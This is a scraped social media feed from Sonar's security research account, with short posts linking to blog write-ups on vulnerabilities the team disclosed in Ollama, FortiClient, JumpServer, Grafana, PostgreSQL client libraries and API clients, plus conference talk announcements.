SonarResearch
@sonarresearch.bsky.social
Cutting-edge security research by
Sonar to educate the world about code security across all software.
We're also at @[email protected] 🦣 and @Sonar_Research 🐦
Sonar to educate the world about code security across all software.
We're also at @[email protected] 🦣 and @Sonar_Research 🐦
From bit flip to RCE in Ollama! 🦙
Our latest blog post explains how a file parsing bug led to an interesting out-of-bounds write primitive. Learn how it could have been exploited in Ollama, a tool to run LLMs locally:
www.sonarsource.com/blog/ollama-...
#security #vulnerability #llm #ai
Our latest blog post explains how a file parsing bug led to an interesting out-of-bounds write primitive. Learn how it could have been exploited in Ollama, a tool to run LLMs locally:
www.sonarsource.com/blog/ollama-...
#security #vulnerability #llm #ai
www.sonarsource.com
November 4, 2025 at 5:20 PM
From bit flip to RCE in Ollama! 🦙
Our latest blog post explains how a file parsing bug led to an interesting out-of-bounds write primitive. Learn how it could have been exploited in Ollama, a tool to run LLMs locally:
www.sonarsource.com/blog/ollama-...
#security #vulnerability #llm #ai
Our latest blog post explains how a file parsing bug led to an interesting out-of-bounds write primitive. Learn how it could have been exploited in Ollama, a tool to run LLMs locally:
www.sonarsource.com/blog/ollama-...
#security #vulnerability #llm #ai
🔄📦 GitHub Actions offer powerful automation capabilities for CI/CD, but they're not immune to attacks.
Take a look at how we tackle this risk with SonarQube Cloud by diving into real-world vulnerabilities.
www.sonarsource.com/blog/securin...
#appsec #security #vulnerability
Take a look at how we tackle this risk with SonarQube Cloud by diving into real-world vulnerabilities.
www.sonarsource.com/blog/securin...
#appsec #security #vulnerability
Securing GitHub Actions With SonarQube: Real-World Examples
This blog introduces SonarQube's enhanced analysis capabilities for GitHub Actions, designed to proactively identify and remediate security vulnerabilities like Command Injection and Code Execution th...
www.sonarsource.com
October 15, 2025 at 3:55 PM
🔄📦 GitHub Actions offer powerful automation capabilities for CI/CD, but they're not immune to attacks.
Take a look at how we tackle this risk with SonarQube Cloud by diving into real-world vulnerabilities.
www.sonarsource.com/blog/securin...
#appsec #security #vulnerability
Take a look at how we tackle this risk with SonarQube Cloud by diving into real-world vulnerabilities.
www.sonarsource.com/blog/securin...
#appsec #security #vulnerability
Using SonarQube to solve a CTF challenge? Done! ✅
Learn how we detected a 0-day vulnerability during #KalmarCTF, making us first to solve the challenge! From Zip Slip to RCE, using lazy class loading:
www.sonarsource.com/blog/code-se...
#appsec #CTF #vulnerability
Learn how we detected a 0-day vulnerability during #KalmarCTF, making us first to solve the challenge! From Zip Slip to RCE, using lazy class loading:
www.sonarsource.com/blog/code-se...
#appsec #CTF #vulnerability
www.sonarsource.com
September 16, 2025 at 3:38 PM
Using SonarQube to solve a CTF challenge? Done! ✅
Learn how we detected a 0-day vulnerability during #KalmarCTF, making us first to solve the challenge! From Zip Slip to RCE, using lazy class loading:
www.sonarsource.com/blog/code-se...
#appsec #CTF #vulnerability
Learn how we detected a 0-day vulnerability during #KalmarCTF, making us first to solve the challenge! From Zip Slip to RCE, using lazy class loading:
www.sonarsource.com/blog/code-se...
#appsec #CTF #vulnerability
🗒️✍️Taking a note on security: our latest blog post focuses on Go vulnerabilities, including Arbitrary File Write, XSS, and Misconfiguration. Showcasing our new support for the language in SonarQube Cloud!
www.sonarsource.com/blog/securin...
#appsec #security #vulnerability
www.sonarsource.com/blog/securin...
#appsec #security #vulnerability
Securing Go Applications With SonarQube: Real-World Examples
Take a deep dive into some vulnerabilities in Go applications and understand how SonarQube Cloud helps developers detect and mitigate them during the development cycle.
www.sonarsource.com
August 7, 2025 at 2:44 PM
🗒️✍️Taking a note on security: our latest blog post focuses on Go vulnerabilities, including Arbitrary File Write, XSS, and Misconfiguration. Showcasing our new support for the language in SonarQube Cloud!
www.sonarsource.com/blog/securin...
#appsec #security #vulnerability
www.sonarsource.com/blog/securin...
#appsec #security #vulnerability
📱 Ever wondered what vulnerabilities look like in Android apps?
We have 2 real-world examples for you! From simple misconfig to cross-app data flow, learn how vulnerabilities manifest in the Kotlin code of Android apps:
www.sonarsource.com/blog/securin...
#appsec #security #vulnerability
We have 2 real-world examples for you! From simple misconfig to cross-app data flow, learn how vulnerabilities manifest in the Kotlin code of Android apps:
www.sonarsource.com/blog/securin...
#appsec #security #vulnerability
Securing Kotlin Apps With SonarQube: Real-World Examples
Explore how real-world vulnerabilities look in the Kotlin code of Android apps and see how SonarQube helps detect them.
www.sonarsource.com
July 16, 2025 at 1:19 PM
📱 Ever wondered what vulnerabilities look like in Android apps?
We have 2 real-world examples for you! From simple misconfig to cross-app data flow, learn how vulnerabilities manifest in the Kotlin code of Android apps:
www.sonarsource.com/blog/securin...
#appsec #security #vulnerability
We have 2 real-world examples for you! From simple misconfig to cross-app data flow, learn how vulnerabilities manifest in the Kotlin code of Android apps:
www.sonarsource.com/blog/securin...
#appsec #security #vulnerability
🔓⏫ After compromising every endpoint within an organization, our “Caught in the FortiNet” blog series comes to an end with one more thing.
Read more about FortiClient's XPC mistake that allows local privilege escalation to root on macOS:
www.sonarsource.com/blog/caught-...
#appsec #security
Read more about FortiClient's XPC mistake that allows local privilege escalation to root on macOS:
www.sonarsource.com/blog/caught-...
#appsec #security
Caught in the FortiNet: How Attackers Can Exploit FortiClient to Compromise Organizations (3/3)
In the last blog of this series, we will focus back on FortiClient and learn how the inner workings of this application work, and what crucial mistake happened that led to us uncovering a local privil...
www.sonarsource.com
July 8, 2025 at 3:32 PM
🔓⏫ After compromising every endpoint within an organization, our “Caught in the FortiNet” blog series comes to an end with one more thing.
Read more about FortiClient's XPC mistake that allows local privilege escalation to root on macOS:
www.sonarsource.com/blog/caught-...
#appsec #security
Read more about FortiClient's XPC mistake that allows local privilege escalation to root on macOS:
www.sonarsource.com/blog/caught-...
#appsec #security
📁🫷🚧Can't control the extension of a file upload, but you want an XSS?
Read more on how we overcame this obstacle to further exploit entire organizations using Fortinet endpoint protection:
www.sonarsource.com/blog/caught-...
#appsec #vulnerability #bugbountytips
Read more on how we overcame this obstacle to further exploit entire organizations using Fortinet endpoint protection:
www.sonarsource.com/blog/caught-...
#appsec #vulnerability #bugbountytips
Caught in the FortiNet: How Attackers Can Exploit FortiClient to Compromise Organizations (2/3)
We recently discovered critical vulnerabilities in Fortinet’s endpoint protection solution that enable attackers to fully compromise organizations with minimal user interaction. In this second article...
www.sonarsource.com
July 1, 2025 at 2:21 PM
📁🫷🚧Can't control the extension of a file upload, but you want an XSS?
Read more on how we overcame this obstacle to further exploit entire organizations using Fortinet endpoint protection:
www.sonarsource.com/blog/caught-...
#appsec #vulnerability #bugbountytips
Read more on how we overcame this obstacle to further exploit entire organizations using Fortinet endpoint protection:
www.sonarsource.com/blog/caught-...
#appsec #vulnerability #bugbountytips
🕸️🏢Caught in the FortiNet: Exploiting Fortinet’s endpoint protection solution to compromise an entire organization using minimal user interaction.
Dive into our technical analysis of this interesting attack scenario:
www.sonarsource.com/blog/caught-...
#appsec #security #vulnerability
Dive into our technical analysis of this interesting attack scenario:
www.sonarsource.com/blog/caught-...
#appsec #security #vulnerability
Caught in the FortiNet: How Attackers Can Exploit FortiClient to Compromise Organizations (1/3)
We recently discovered critical vulnerabilities in Fortinet’s endpoint protection solution that enable attackers to fully compromise organizations with minimal user interaction. In the first post of t...
www.sonarsource.com
June 26, 2025 at 2:14 PM
🕸️🏢Caught in the FortiNet: Exploiting Fortinet’s endpoint protection solution to compromise an entire organization using minimal user interaction.
Dive into our technical analysis of this interesting attack scenario:
www.sonarsource.com/blog/caught-...
#appsec #security #vulnerability
Dive into our technical analysis of this interesting attack scenario:
www.sonarsource.com/blog/caught-...
#appsec #security #vulnerability
Catch our second talk at #TROOPERS25:
🕸️ Caught in the FortiNet: Compromising Organizations Using Endpoint Protection
Yaniv Nizry will tell you the story of multiple vulnerabilities in Fortinet products that can compromise an entire organization, starting with a single click
🕸️ Caught in the FortiNet: Compromising Organizations Using Endpoint Protection
Yaniv Nizry will tell you the story of multiple vulnerabilities in Fortinet products that can compromise an entire organization, starting with a single click
June 24, 2025 at 8:32 AM
Catch our second talk at #TROOPERS25:
🕸️ Caught in the FortiNet: Compromising Organizations Using Endpoint Protection
Yaniv Nizry will tell you the story of multiple vulnerabilities in Fortinet products that can compromise an entire organization, starting with a single click
🕸️ Caught in the FortiNet: Compromising Organizations Using Endpoint Protection
Yaniv Nizry will tell you the story of multiple vulnerabilities in Fortinet products that can compromise an entire organization, starting with a single click
Coming to #TROOPERS25 this week? We'll be there too, presenting our research!
🎨 Scriptless Attacks: Why CSS is My Favorite Programming Language
@pspaul95.bsky.social will convince you why CSS should not be overlooked in client-side web attacks and what is possible without JavaScript today
🎨 Scriptless Attacks: Why CSS is My Favorite Programming Language
@pspaul95.bsky.social will convince you why CSS should not be overlooked in client-side web attacks and what is possible without JavaScript today
June 23, 2025 at 10:57 AM
Coming to #TROOPERS25 this week? We'll be there too, presenting our research!
🎨 Scriptless Attacks: Why CSS is My Favorite Programming Language
@pspaul95.bsky.social will convince you why CSS should not be overlooked in client-side web attacks and what is possible without JavaScript today
🎨 Scriptless Attacks: Why CSS is My Favorite Programming Language
@pspaul95.bsky.social will convince you why CSS should not be overlooked in client-side web attacks and what is possible without JavaScript today
SQL Injection despite using prepared statements? 🧐
Turns out that SQL syntax can be ambiguous! Learn how this has led to vulnerabilities in several popular PostgreSQL client libraries:
www.sonarsource.com/blog/double-...
#appsec #security #vulnerability
Turns out that SQL syntax can be ambiguous! Learn how this has led to vulnerabilities in several popular PostgreSQL client libraries:
www.sonarsource.com/blog/double-...
#appsec #security #vulnerability
Double Dash, Double Trouble: A Subtle SQL Injection Flaw
Can a simple dash character introduce a security risk? Discover how SQL line comments can open the door to unexpected injection vulnerabilities in several PostgreSQL client libraries!
www.sonarsource.com
June 10, 2025 at 3:20 PM
SQL Injection despite using prepared statements? 🧐
Turns out that SQL syntax can be ambiguous! Learn how this has led to vulnerabilities in several popular PostgreSQL client libraries:
www.sonarsource.com/blog/double-...
#appsec #security #vulnerability
Turns out that SQL syntax can be ambiguous! Learn how this has led to vulnerabilities in several popular PostgreSQL client libraries:
www.sonarsource.com/blog/double-...
#appsec #security #vulnerability
Scripting Outside the Box! 📦
Last week, we saw JS sandboxing pitfalls in API clients. Today, we continue with more complex sandbox escapes in Bruno and Hoppscotch.
Learn how they work and how to sandbox JS securely in part 2:
www.sonarsource.com/blog/scripti...
#appsec #security #vulnerability
Last week, we saw JS sandboxing pitfalls in API clients. Today, we continue with more complex sandbox escapes in Bruno and Hoppscotch.
Learn how they work and how to sandbox JS securely in part 2:
www.sonarsource.com/blog/scripti...
#appsec #security #vulnerability
Scripting Outside the Box: API Client Security Risks (2/2)
Continuing on API client security, we cover more sandbox bypasses, this time in Bruno and Hoppscotch, as well as JavaScript sandboxing best practices.
www.sonarsource.com
May 20, 2025 at 2:48 PM
Scripting Outside the Box! 📦
Last week, we saw JS sandboxing pitfalls in API clients. Today, we continue with more complex sandbox escapes in Bruno and Hoppscotch.
Learn how they work and how to sandbox JS securely in part 2:
www.sonarsource.com/blog/scripti...
#appsec #security #vulnerability
Last week, we saw JS sandboxing pitfalls in API clients. Today, we continue with more complex sandbox escapes in Bruno and Hoppscotch.
Learn how they work and how to sandbox JS securely in part 2:
www.sonarsource.com/blog/scripti...
#appsec #security #vulnerability
Ever wondered what's going on behind the scenes of your API client? 🕵️♀️
We dug in and found a variety of JS sandboxing pitfalls! Find out how Postman and Insomnia tried to isolate untrusted code and what challenges they faced:
www.sonarsource.com/blog/scripti...
#appsec #security #vulnerability
We dug in and found a variety of JS sandboxing pitfalls! Find out how Postman and Insomnia tried to isolate untrusted code and what challenges they faced:
www.sonarsource.com/blog/scripti...
#appsec #security #vulnerability
Scripting Outside the Box: API Client Security Risks (1/2)
Discover hidden risks in API testing tools like Postman and Insomnia. We dive into scripting vulnerabilities and explore JavaScript sandbox security pitfalls.
www.sonarsource.com
May 13, 2025 at 3:09 PM
Ever wondered what's going on behind the scenes of your API client? 🕵️♀️
We dug in and found a variety of JS sandboxing pitfalls! Find out how Postman and Insomnia tried to isolate untrusted code and what challenges they faced:
www.sonarsource.com/blog/scripti...
#appsec #security #vulnerability
We dug in and found a variety of JS sandboxing pitfalls! Find out how Postman and Insomnia tried to isolate untrusted code and what challenges they faced:
www.sonarsource.com/blog/scripti...
#appsec #security #vulnerability
📊⚠️ Data in danger!
We found an XSS vulnerability in Grafana with the help of SonarQube. Learn about the details in our latest blog post:
www.sonarsource.com/blog/data-in...
#appsec #security #vulnerability
We found an XSS vulnerability in Grafana with the help of SonarQube. Learn about the details in our latest blog post:
www.sonarsource.com/blog/data-in...
#appsec #security #vulnerability
Data in Danger: Detecting Cross-Site Scripting in Grafana
Learn how SonarQube detected a Cross-Site Scripting (XSS) vulnerability in Grafana, a popular open-source data observability platform.
www.sonarsource.com
April 24, 2025 at 3:02 PM
📊⚠️ Data in danger!
We found an XSS vulnerability in Grafana with the help of SonarQube. Learn about the details in our latest blog post:
www.sonarsource.com/blog/data-in...
#appsec #security #vulnerability
We found an XSS vulnerability in Grafana with the help of SonarQube. Learn about the details in our latest blog post:
www.sonarsource.com/blog/data-in...
#appsec #security #vulnerability
🦘🛜 Our second part of the “Diving Into JumpServer” series is live:
Read more on how an attacker who bypassed authentication can execute code and fully compromise the JumpServer instance and internal hosts:
www.sonarsource.com/blog/diving-...
#appsec #security #vulnerability
Read more on how an attacker who bypassed authentication can execute code and fully compromise the JumpServer instance and internal hosts:
www.sonarsource.com/blog/diving-...
#appsec #security #vulnerability
www.sonarsource.com
March 25, 2025 at 3:28 PM
🦘🛜 Our second part of the “Diving Into JumpServer” series is live:
Read more on how an attacker who bypassed authentication can execute code and fully compromise the JumpServer instance and internal hosts:
www.sonarsource.com/blog/diving-...
#appsec #security #vulnerability
Read more on how an attacker who bypassed authentication can execute code and fully compromise the JumpServer instance and internal hosts:
www.sonarsource.com/blog/diving-...
#appsec #security #vulnerability
🦘🛜Compromising bastion host to gain full control over the internal infrastructure.
Read more about the vulnerabilities we uncovered in JumpServer in our recent blog post:
www.sonarsource.com/blog/diving-...
#appsec #security #vulnerability
Read more about the vulnerabilities we uncovered in JumpServer in our recent blog post:
www.sonarsource.com/blog/diving-...
#appsec #security #vulnerability
Diving Into JumpServer: Attacker’s Gateway to Internal Networks (1/2)
Bastion host offers a centralized point of access and control to an internal network, but what happens when this gateway itself is compromised? In this blog series, we will dive into vulnerabilities w...
www.sonarsource.com
March 20, 2025 at 3:13 PM
🦘🛜Compromising bastion host to gain full control over the internal infrastructure.
Read more about the vulnerabilities we uncovered in JumpServer in our recent blog post:
www.sonarsource.com/blog/diving-...
#appsec #security #vulnerability
Read more about the vulnerabilities we uncovered in JumpServer in our recent blog post:
www.sonarsource.com/blog/diving-...
#appsec #security #vulnerability